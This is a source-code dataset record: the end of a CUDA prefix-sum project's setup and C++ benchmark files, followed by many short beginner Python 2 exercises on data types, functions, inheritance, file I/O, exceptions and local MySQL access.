"language": "Python", "length_bytes": 780, "license_type": "no_license", "max_line_length": 89, "num_lines": 26, "path": "/setup.py", "repo_name": "sunyt32/parallel_scan", "src_encoding": "UTF-8", "text": "import torch\nimport os\nfrom setuptools import find_packages, setup\nfrom torch.utils.cpp_extension import CUDA_HOME, CppExtension, CUDAExtension\n\nclass BuildExtension(torch.utils.cpp_extension.BuildExtension):\n def __init__(self, *args, **kwargs):\n super().__init__(use_ninja=False, *args, **kwargs)\n\nnvcc_args = []\nnvcc_flags_env = os.getenv(\"NVCC_FLAGS\", \"\")\nif nvcc_flags_env != \"\":\n nvcc_args.extend(nvcc_flags_env.split(\" \"))\n\nextra_compile_args = {}\nextra_compile_args[\"nvcc\"] = nvcc_args\n\nsetup(\n name=\"prefix_sum\",\n author=\"Matt Dean, Lixin Xue\",\n description=\"Parallel Prefix Sum on CUDA with Pytorch API\",\n ext_modules=[\n CUDAExtension('prefix_sum', ['prefix_sum.cu'], extra_compile_args=extra_compile_args)\n ],\n cmdclass={\"build_ext\": BuildExtension},\n)\n" }, { "alpha_fraction": 0.5623237490653992, "alphanum_fraction": 0.6085730195045471, "avg_line_length": 18.932584762573242, "blob_id": "9b02d535acbfa3d36b271ec467a7d1c092f0ac24", "content_id": "61904aef61899087a50dda4bf28da66f20dd0f66", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 1773, "license_type": "no_license", "max_line_length": 69, "num_lines": 89, "path": "/parallel-scan/Main.cpp", "repo_name": "sunyt32/parallel_scan", "src_encoding": "UTF-8", "text": "#include <stdlib.h>\n#include <stdio.h>\n\n#include <time.h>\n\n#include \"scan.cuh\"\n#include \"utils.h\"\n\nvoid test(int N) {\n\tbool canBeBlockscanned = N <= 1024;\n\n\ttime_t t;\n\tsrand((unsigned)time(&t));\n\tint *in = new int[N];\n\tfor (int i = 0; i < N; i++) {\n\t\tin[i] = rand() % 10;\n\t}\n\n\tprintf(\"%i Elements \\n\", N);\n\n\t\t// sequential scan on CPU\n\t\tint *outHost = new int[N]();\n\t\tlong time_host = sequential_scan(outHost, in, 
N);\n\t\tprintResult(\"host \", outHost[N - 1], time_host);\n\n\t\t// full scan\n\t\tint *outGPU = new int[N]();\n\t\tfloat time_gpu = scan(outGPU, in, N, false);\n\t\tprintResult(\"gpu \", outGPU[N - 1], time_gpu);\n\t\n\t\t// full scan with BCAO\n\t\tint *outGPU_bcao = new int[N]();\n\t\tfloat time_gpu_bcao = scan(outGPU_bcao, in, N, true);\n\t\tprintResult(\"gpu bcao\", outGPU_bcao[N - 1], time_gpu_bcao);\n\n\t\tif (canBeBlockscanned) {\n\t\t\t// basic level 1 block scan\n\t\t\tint *out_1block = new int[N]();\n\t\t\tfloat time_1block = blockscan(out_1block, in, N, false);\n\t\t\tprintResult(\"level 1 \", out_1block[N - 1], time_1block);\n\n\t\t\t// level 1 block scan with BCAO\n\t\t\tint *out_1block_bcao = new int[N]();\n\t\t\tfloat time_1block_bcao = blockscan(out_1block_bcao, in, N, true);\n\t\t\tprintResult(\"l1 bcao \", out_1block_bcao[N - 1], time_1block_bcao);\n\n\t\t\tdelete[] out_1block;\n\t\t\tdelete[] out_1block_bcao;\n\t\t}\n\n\tprintf(\"\\n\");\n\n\tdelete[] in;\n\tdelete[] outHost;\n\tdelete[] outGPU;\n\tdelete[] outGPU_bcao;\n}\n\nint main()\n{\n\tint TEN_MILLION = 10000000;\n\tint ONE_MILLION = 1000000;\n\tint TEN_THOUSAND = 10000;\n\n\tint elements[] = {\n\t\tTEN_MILLION * 2,\n\t\tTEN_MILLION,\n\t\tONE_MILLION,\n\t\tTEN_THOUSAND,\n\t\t5000,\n\t\t4096,\n\t\t2048,\n\t\t2000,\n\t\t1000,\n\t\t500,\n\t\t100,\n\t\t64,\n\t\t8,\n\t\t5\n\t};\n\n\tint numElements = sizeof(elements) / sizeof(elements[0]);\n\n\tfor (int i = 0; i < numElements; i++) {\n\t\ttest(elements[i]);\n\t}\n\n\treturn 0;\n}" } ]
7
skatara/Python_2.x
https://github.com/skatara/Python_2.x
1b6385b424c58102ed9041289807f13b4e4d58a3
ddc6ee5d0069b56be9f9905893cd876f161c2c8f
9b2a7220f05f07de108922b8829a5fba7c53d685
refs/heads/master
2018-11-03T18:32:06.172198
2018-09-21T12:56:47
2018-09-21T12:56:47
145,430,456
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5736433863639832, "alphanum_fraction": 0.5736433863639832, "avg_line_length": 15.25, "blob_id": "59dd0a15adc531efece18342ff9b24f410e38e37", "content_id": "47a47e844a83407fb6fb53e3f95d19d623e38111", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 129, "license_type": "no_license", "max_line_length": 23, "num_lines": 8, "path": "/Day4/Inheritance/Inher2.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "class A:\n def myprint(self):\n print \"myprint\"\nclass B:\n def display(self):\n print \"display\"\na=A()\na.myprint()" }, { "alpha_fraction": 0.6377952694892883, "alphanum_fraction": 0.6377952694892883, "avg_line_length": 17.14285659790039, "blob_id": "fd36ab31648f0941317e96c509cbf2998fc41fed", "content_id": "4e9b7d35fa3a3562a34f979361e6f52f6d37d6ab", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 127, "license_type": "no_license", "max_line_length": 44, "num_lines": 7, "path": "/Day5/In_Op/Io11.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=open(\"new file.txt\",\"wr+\")\nb=a.write(raw_input(\"Enter your string : \"))\n\nb=a.read()\nprint b\n\nprint \"file is close\",a.close()\n" }, { "alpha_fraction": 0.5040000081062317, "alphanum_fraction": 0.5680000185966492, "avg_line_length": 9.416666984558105, "blob_id": "0ed6a953c4ee0bfcb11a875c78e4448591a212c3", "content_id": "da94d4c1ac566dcb1a22b4630377dbeb8505519a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 125, "license_type": "no_license", "max_line_length": 21, "num_lines": 12, "path": "/Day2/Number/Num19.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "from math import fabs\na=50.1\n'''abs(x)'''\nprint fabs(a)\n\na=-50.1\n'''abs(x)'''\nprint fabs(a)\n\na=50\n'''abs(x)'''\nprint fabs(a)\n" }, { "alpha_fraction": 0.5806451439857483, 
"alphanum_fraction": 0.6451612710952759, "avg_line_length": 9.666666984558105, "blob_id": "3d3328e75ce0481f33c6330a207d489dd9110698", "content_id": "4e23fd5b128bdc8fa43fa8b7145ad24b83f388a0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 31, "license_type": "no_license", "max_line_length": 16, "num_lines": 3, "path": "/Day2/Number/Num4.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=10\nb=long(a)\nprint b, type(b)" }, { "alpha_fraction": 0.4523809552192688, "alphanum_fraction": 0.5952380895614624, "avg_line_length": 20.25, "blob_id": "8af189ce617b687f5e4398f030a23f134dc1c005", "content_id": "599eaf88d323a10ff8dc53d64d2708475db0cfc8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 84, "license_type": "no_license", "max_line_length": 53, "num_lines": 4, "path": "/Day2/Dictionary/Dict20.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a={'name':'jsi','id':101,'contact':123456,'id':\"102\"}\n\n\nprint \"hello dear %s\"%str(a)" }, { "alpha_fraction": 0.32258063554763794, "alphanum_fraction": 0.5806451439857483, "avg_line_length": 15, "blob_id": "ac8b376838b58575d787481ca161cdbcf973c3b2", "content_id": "763e745e353c00220c2211c4c99ab5405a2df663", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 31, "license_type": "no_license", "max_line_length": 18, "num_lines": 2, "path": "/Day2/Tuple/Tup2.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=(10,20,30,'hey')\nprint a[0:3]" }, { "alpha_fraction": 0.7735849022865295, "alphanum_fraction": 0.7735849022865295, "avg_line_length": 17, "blob_id": "31df37b4ba51519ba85a4dec12c193bb9d260922", "content_id": "be2e6c489d1da03cb7009b23d620eff5fcd33f7d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 53, "license_type": 
"no_license", "max_line_length": 25, "num_lines": 3, "path": "/Vikas/B/Bfile.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "from Vikas.A import afile\nafile.display()\nafile.dis()" }, { "alpha_fraction": 0.5416666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 7.333333492279053, "blob_id": "19f7a16288cf3320ce75a242104259e1e7951207", "content_id": "f2f89692d85ace4dccc33cb3d7ae6f00ec9e413e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24, "license_type": "no_license", "max_line_length": 8, "num_lines": 3, "path": "/Day2/Number/Num15.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=10+5j\nb=int(a)\nprint b" }, { "alpha_fraction": 0.8153846263885498, "alphanum_fraction": 0.8153846263885498, "avg_line_length": 21, "blob_id": "6a08e2b3ae8959272ecb72bcb989789f2e079053", "content_id": "0263fd810d0632750c8019e5b4a6b3716856c2e1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 65, "license_type": "no_license", "max_line_length": 29, "num_lines": 3, "path": "/Day2/String/String11.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "from string import capitalize\na=\"hello world\"\nprint capitalize(a)" }, { "alpha_fraction": 0.6975945234298706, "alphanum_fraction": 0.7113401889801025, "avg_line_length": 25.545454025268555, "blob_id": "6a4fe6f9765225d7ad30befdc03b5102a22ac6bd", "content_id": "47290a43af22a7ba706d96c244fdbdf67ca4b299", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 291, "license_type": "no_license", "max_line_length": 77, "num_lines": 11, "path": "/Day5/Database/mysqlDB/Db9.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import mysql.connector\n'''create database table'''\nmydata=mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"root\",\n 
database=\"SAVANJI\"\n )\ncursor=mydata.cursor()\ncursor.execute(\"CREATE TABLE student (name VARCHAR(25),address VARCHAR(25))\")\nprint cursor" }, { "alpha_fraction": 0.4336283206939697, "alphanum_fraction": 0.5752212405204773, "avg_line_length": 21.399999618530273, "blob_id": "9f76176dc8af8eac1044aea77b7b563c9162968b", "content_id": "f2d3880c19651ec4072bf3e85f9fc5a217257e20", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 113, "license_type": "no_license", "max_line_length": 24, "num_lines": 5, "path": "/Day2/Number/Num25.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "\na=(10,20,30,40,'python')\nb=(10,20,30,40,'hello')\nprint \" min(a)\",min(a)\nprint \" max(a)\",max(a)\nprint cmp(b, a)\n" }, { "alpha_fraction": 0.38461539149284363, "alphanum_fraction": 0.5692307949066162, "avg_line_length": 15.5, "blob_id": "c2e39d13f1ca7c148acd61e4fc9f3deee2ebcd93", "content_id": "68cd88c26227ed4e3786a35d3d332604d3b5c6a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 65, "license_type": "no_license", "max_line_length": 55, "num_lines": 4, "path": "/Day2/Dictionary/Dict15.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a={['name']:'jsi','id':101,'contact':123456,'id':\"102\"}\n\n\nprint a" }, { "alpha_fraction": 0.43396225571632385, "alphanum_fraction": 0.6226415038108826, "avg_line_length": 12.5, "blob_id": "ab09e563e2296a55577e14d46767ac5373d51101", "content_id": "48d85f543d64c9fe400ce0f74f845c6ee17a5f40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 53, "license_type": "no_license", "max_line_length": 25, "num_lines": 4, "path": "/Day2/List/List7.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=[10,20,50.5,'hey',500L]\nb=\"py\"\nprint min(a)\nprint a" }, { "alpha_fraction": 0.4444444477558136, "alphanum_fraction": 
0.6296296119689941, "avg_line_length": 10, "blob_id": "2560661aadff9cbffc32791087116679d5a057a6", "content_id": "f5542d20f352d33ba923d2aec0302614df86e80e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 54, "license_type": "no_license", "max_line_length": 25, "num_lines": 5, "path": "/Day2/List/List6.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=[10,20,50.5,'hey',500L]\nb=\"py\"\nprint a\ndel a\nprint a" }, { "alpha_fraction": 0.738095223903656, "alphanum_fraction": 0.738095223903656, "avg_line_length": 20.25, "blob_id": "36972ab12df4f9e239b34a1796e2b9a46718d585", "content_id": "e87243544eeb5df4ade455e33b4d7827418388b9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 84, "license_type": "no_license", "max_line_length": 39, "num_lines": 4, "path": "/Day5/Test_2_speech/TTS1.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import pyttsx\na=pyttsx.init()\na.say(\"hey python how are you my jaan\")\na.runAndWait()" }, { "alpha_fraction": 0.6000000238418579, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 12.5, "blob_id": "4f35fe0676ddee3942529fb4669ac53412a8ccb5", "content_id": "c685b9344c8854fc5dc1e0888a66e28d8d2903f0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 55, "license_type": "no_license", "max_line_length": 24, "num_lines": 4, "path": "/Day5/In_Op/Io6.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "\na=open(\"myfile.txt\",\"r\")\nb=a.read()\nprint b\na.close()\n" }, { "alpha_fraction": 0.4153846204280853, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 12.199999809265137, "blob_id": "3dc5203fd1169cdd34594d807630c42d90d87b8f", "content_id": "759a8f5dcc83f18ac8b7c164d92639887cd68327", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 
"length_bytes": 65, "license_type": "no_license", "max_line_length": 25, "num_lines": 5, "path": "/Day2/List/List4.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=[10,20,50.5,'hey',500L]\nb=\"py\"\nprint a[2]\na[2]=\"python\"\nprint a" }, { "alpha_fraction": 0.6060606241226196, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 10.333333015441895, "blob_id": "76ed74f854b17cec973a12de9af4000be9524bbf", "content_id": "2585f395e1164f0e0cec3a1b4d3e47dbe587db3c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 33, "license_type": "no_license", "max_line_length": 16, "num_lines": 3, "path": "/Day2/Number/Num10.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=10L\nb=float(a)\nprint b, type(b)" }, { "alpha_fraction": 0.6158192157745361, "alphanum_fraction": 0.6158192157745361, "avg_line_length": 20.875, "blob_id": "4824bccf4e64d0a9898a1f6a7abd677f8658db53", "content_id": "0f0ad47fe36ccf7e7a492c62c12fde1c7c54bfbc", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 177, "license_type": "no_license", "max_line_length": 44, "num_lines": 8, "path": "/Day5/Exception/Excep5.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "try:\n a=open(\"test.txt\",\"w\")\n a.write(\"hey this is java\")\nexcept:\n print \"cant not file and write the file\"\nelse:\n print \"file is succesfully write\"\n a.close() " }, { "alpha_fraction": 0.625, "alphanum_fraction": 0.625, "avg_line_length": 15, "blob_id": "48be03a863f95f7b2fb0333d8ff8a00000ccb954", "content_id": "aba237555425860361c21d2c9c85faccf3e42548", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 80, "license_type": "no_license", "max_line_length": 31, "num_lines": 5, "path": "/Day5/In_Op/Io10.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=open(\"new 
file.txt\",\"r+\")\nb=a.read()\nprint b\n\nprint \"file is close\",a.close()\n" }, { "alpha_fraction": 0.6538461446762085, "alphanum_fraction": 0.6730769276618958, "avg_line_length": 12.25, "blob_id": "cd3528ba6f7ee3e632d2c3423a8f13ac85af2cfd", "content_id": "465a723e5b685484ff25390fa1e85da14778b2db", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 52, "license_type": "no_license", "max_line_length": 20, "num_lines": 4, "path": "/Day5/In_Op/OS/os2.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import os\n#a=os.mkdir(\"os1/a\")\nb=os.getcwd()\nprint b" }, { "alpha_fraction": 0.5914633870124817, "alphanum_fraction": 0.7560975551605225, "avg_line_length": 19.375, "blob_id": "73ceb29195ad35016057a79db429d20950ef52fa", "content_id": "cc78eded1db98825093b494602ef92ec25dae383", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 164, "license_type": "no_license", "max_line_length": 32, "num_lines": 8, "path": "/Day2/Number/Random.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import random\na=20\nprint random.random()\nprint random.choice([10,20,30])\nprint random.randrange(10,100,5)\nlist1=[10,20,30,40,50]\nrandom.shuffle(list1)\nprint list1\n\n" }, { "alpha_fraction": 0.574999988079071, "alphanum_fraction": 0.6499999761581421, "avg_line_length": 39.5, "blob_id": "2bc21573c424d66a1f89f0c269a11ab0cfdef8cb", "content_id": "4962173b2a7358be820155edc985fa771cc59974", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 80, "license_type": "no_license", "max_line_length": 64, "num_lines": 2, "path": "/Day2/String/String8.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=\"hello world\"\nprint \"hey %s. 
tell me ur contact number %d : \"%('mark',123456)" }, { "alpha_fraction": 0.5502392053604126, "alphanum_fraction": 0.5502392053604126, "avg_line_length": 12.933333396911621, "blob_id": "36635ce2dba20016591742162aa4ecd1025d4f25", "content_id": "18932a72ae4976de42ab38c11d95dd8666bd79ca", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 209, "license_type": "no_license", "max_line_length": 23, "num_lines": 15, "path": "/Day4/Inheritance/Inher4.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "class A:\n def myprint(self):\n print \"myprint\"\nclass B(A):\n def display(self):\n print \"display\"\n\nclass C(B):\n def show(self):\n print \"show\"\n\nc=C()\nc.myprint()\nc.display()\nc.show()\n" }, { "alpha_fraction": 0.6463414430618286, "alphanum_fraction": 0.6463414430618286, "avg_line_length": 10.571428298950195, "blob_id": "8e3b1c7de17c64d06bc2a32f9c02f8b6bd553163", "content_id": "e1b315ea714eb8bc767cfb03658b4cc4738c21b4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 82, "license_type": "no_license", "max_line_length": 24, "num_lines": 7, "path": "/Day5/In_Op/Io8.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "\na=open(\"myfile.txt\",\"r\")\nb=a.read()\nprint a.mode\nprint a.name\n\nprint b\na.close()\n" }, { "alpha_fraction": 0.7755101919174194, "alphanum_fraction": 0.7755101919174194, "avg_line_length": 11.5, "blob_id": "cda77c452f655564b57bda73668af8e5a3e755f8", "content_id": "8b4620b1054a83e518664dbc986a87693ab58094", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 49, "license_type": "no_license", "max_line_length": 17, "num_lines": 4, "path": "/Day3/Module/mytest.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import Phone\nPhone.musicplay()\nPhone.msg()\nPhone." 
}, { "alpha_fraction": 0.6351351141929626, "alphanum_fraction": 0.6351351141929626, "avg_line_length": 23.33333396911621, "blob_id": "208461a4fc153e9834daa2b13c7b43c5c818971c", "content_id": "92c247f328b397b91f17d01389269769f12ac17b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 74, "license_type": "no_license", "max_line_length": 35, "num_lines": 3, "path": "/Day5/In_Op/Io5.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "\na=open(\"myfile.txt\",\"wr+\")\na.write(\"Enter your String data: \")\na.close()\n" }, { "alpha_fraction": 0.5454545617103577, "alphanum_fraction": 0.6363636255264282, "avg_line_length": 10.333333015441895, "blob_id": "a264cc895b86376952e49e0018b2b26d22f86c95", "content_id": "4ebd70c1d563a55bcd29a249b444b52da136ac68", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 33, "license_type": "no_license", "max_line_length": 16, "num_lines": 3, "path": "/Day2/Number/Num12.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=10.0\nb=long(a)\nprint b, type(b)" }, { "alpha_fraction": 0.46666666865348816, "alphanum_fraction": 0.6333333253860474, "avg_line_length": 19.33333396911621, "blob_id": "92e41d2a17690b77a2bc3aeda2f47a51db1483b2", "content_id": "c1be63d052eb29e7a40bacb0b1a96cd502e56f87", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 60, "license_type": "no_license", "max_line_length": 25, "num_lines": 3, "path": "/Day2/List/List1.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=[10,20,50.5,'hey',500L]\nb=tuple(a)\nprint b,type(b),type(a)" }, { "alpha_fraction": 0.655339777469635, "alphanum_fraction": 0.6650485396385193, "avg_line_length": 24.75, "blob_id": "ba3d462df84911df3fff11717e413d89a74727c1", "content_id": "814300e5912d86036f9b8561dd357f335352ee90", "detected_licenses": [], "is_generated": 
false, "is_vendor": false, "language": "Python", "length_bytes": 206, "license_type": "no_license", "max_line_length": 52, "num_lines": 8, "path": "/Day2/Function/Fun8.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "def printme(name,age):\n \"This prints a passed string into this function\"\n print \"name : %s\"%name\n print \"age : %d\"%age\n return;\n\n# Now you can call printme function\nprintme(name='savan',age=25)\n" }, { "alpha_fraction": 0.5845070481300354, "alphanum_fraction": 0.5845070481300354, "avg_line_length": 16.875, "blob_id": "e0d11640d9551cf38c4c6fe4cd90749420a1589d", "content_id": "aa2878989c0b6c009040230fa8df54722596057c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 142, "license_type": "no_license", "max_line_length": 26, "num_lines": 8, "path": "/Day4/overriding/overriding.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "class papa:\n def show(self):\n print \"show papa\"\nclass child(papa):\n def show(self):\n print \"show child\"\nc=child()\nc.show()" }, { "alpha_fraction": 0.5964912176132202, "alphanum_fraction": 0.6374269127845764, "avg_line_length": 13.25, "blob_id": "e1005307d1df48f96e57706664e2700efcef9024", "content_id": "f3e9ef442d0a44931ff4247397de3630c6791e9a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 171, "license_type": "no_license", "max_line_length": 59, "num_lines": 12, "path": "/Day2/Number/Num21.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "from math import fabs\na=50L\n'''fabs(x) used as float value.its gives you float value'''\nprint fabs(a)\n\na=-50.1\n'''abs(x)'''\nprint fabs(a)\n\na=50\n'''abs(x)'''\nprint fabs(a)\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 0.6666666865348816, "avg_line_length": 28, "blob_id": "85e9b83c927be8cece9649a8889935fffa4a4ab1", "content_id": 
"b06ae0298feac71d269350fea5754c19a51bdec8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 57, "license_type": "no_license", "max_line_length": 36, "num_lines": 2, "path": "/Day5/Consol/Consol1.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=input(\"Enter you number value : \")\nprint \"welcome : \",a" }, { "alpha_fraction": 0.5076923370361328, "alphanum_fraction": 0.6000000238418579, "avg_line_length": 25.200000762939453, "blob_id": "d61bc3e5cbfc80d077f56ca35a91cf9735efa480", "content_id": "f8fa0601f93a311d59ee44733adb11f04397b836", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 130, "license_type": "no_license", "max_line_length": 53, "num_lines": 5, "path": "/Day2/Dictionary/Dict23.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a={'name':'jsi','id':101,'contact':123456,'id':\"102\"}\nb={'company':\"jsi\"}\na.update(b)\nprint a.get('id')\nprint a.get('hey','hello')" }, { "alpha_fraction": 0.6086956262588501, "alphanum_fraction": 0.695652186870575, "avg_line_length": 7, "blob_id": "ae2e969cf68afabd1e6fc678195e23680526b266", "content_id": "e66f0c443fdb204f9691cb9b19a38b630907347a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 23, "license_type": "no_license", "max_line_length": 10, "num_lines": 3, "path": "/Day2/Number/Num3.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a=10\nb=float(a)\nprint b" }, { "alpha_fraction": 0.5892857313156128, "alphanum_fraction": 0.6071428656578064, "avg_line_length": 12.75, "blob_id": "6e7b1e30f41ed8e3a714caceb9999526a350387b", "content_id": "0a5ea93f380e7c04801557936a612c95f91a1f55", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 56, "license_type": "no_license", "max_line_length": 24, "num_lines": 4, "path": 
"/Day5/In_Op/Io7.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "\na=open(\"myfile.txt\",\"r\")\nb=a.read(5)\nprint b\na.close()\n" }, { "alpha_fraction": 0.692307710647583, "alphanum_fraction": 0.692307710647583, "avg_line_length": 9.600000381469727, "blob_id": "3f07abeda4a52169eeeac9a8534cee29369c2799", "content_id": "dc4317259a0cd8137f4768761a38649affb21734", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 52, "license_type": "no_license", "max_line_length": 15, "num_lines": 5, "path": "/Day3/B/C.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "from B import A\n\nA.Amodule()\nA.Bmodule()\nA.Cmodule()" }, { "alpha_fraction": 0.6748466491699219, "alphanum_fraction": 0.6748466491699219, "avg_line_length": 19.375, "blob_id": "7893306e73c574237392a02eae7ec1c5cb0ae5a1", "content_id": "4d1d3442b51d9f67469b36247c052a6f5064365e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 163, "license_type": "no_license", "max_line_length": 31, "num_lines": 8, "path": "/Day5/Database/mysqlDB/Db8.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import mysql.connector\nmydata=mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"root\",\n database=\"SAVANJI\"\n )\nprint mydata\n" }, { "alpha_fraction": 0.5506607890129089, "alphanum_fraction": 0.5506607890129089, "avg_line_length": 12.352941513061523, "blob_id": "fd5fdd2b2dee2fb3572c49168620763d06c87a59", "content_id": "815b7a1d6345dab465074c74d339646ec88c56d9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 227, "license_type": "no_license", "max_line_length": 23, "num_lines": 17, "path": "/Day4/Inheritance/Inher.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "class A:\n def myprint(self):\n print \"myprint\"\nclass B(A):\n def 
display(self):\n print \"display\"\n\nclass C(A):\n def show(self):\n print \"show\"\n\nc=C()\nb=B()\nc.myprint()\nb.display()\nb.myprint()\nc.show()\n" }, { "alpha_fraction": 0.4655172526836395, "alphanum_fraction": 0.6206896305084229, "avg_line_length": 28.5, "blob_id": "42a5d11f3461627cef48e64b72c8e68440319ac5", "content_id": "53273f4a02e1bf4e4011d502bfc8f0d59a29b46c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 58, "license_type": "no_license", "max_line_length": 42, "num_lines": 2, "path": "/Day2/Dictionary/Dict5.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "a={'name':'jsi','id':101,'contact':123456}\nprint a['name']" }, { "alpha_fraction": 0.7058823704719543, "alphanum_fraction": 0.7058823704719543, "avg_line_length": 19.18181800842285, "blob_id": "e9bd9cc03c2dc33ce86847f6526dcc083b855be7", "content_id": "fb62cf9fc2b0d7ab351c5405e50cf24f9eab4f62", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 221, "license_type": "no_license", "max_line_length": 32, "num_lines": 11, "path": "/Day5/Database/mysqlDB/Db7.py", "repo_name": "skatara/Python_2.x", "src_encoding": "UTF-8", "text": "import mysql.connector\nmydata=mysql.connector.connect(\n host=\"localhost\",\n user=\"root\",\n password=\"root\"\n )\ncursor=mydata.cursor()\ncursor.execute(\"SHOW DATABASES\")\n\nfor dfetch in cursor:\n print dfetch" }, { "alpha_fraction": 0.5925925970077515, "alphanum_fraction": 0.6402116417884827, "avg_line_length": 17.899999618530273, "blob_id": "9ad7534301131874294b9fe545117415b6696638", "content_id": "7cd71a0d24abebf2101fd8889986320b75e4d90e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 189, "license_type": 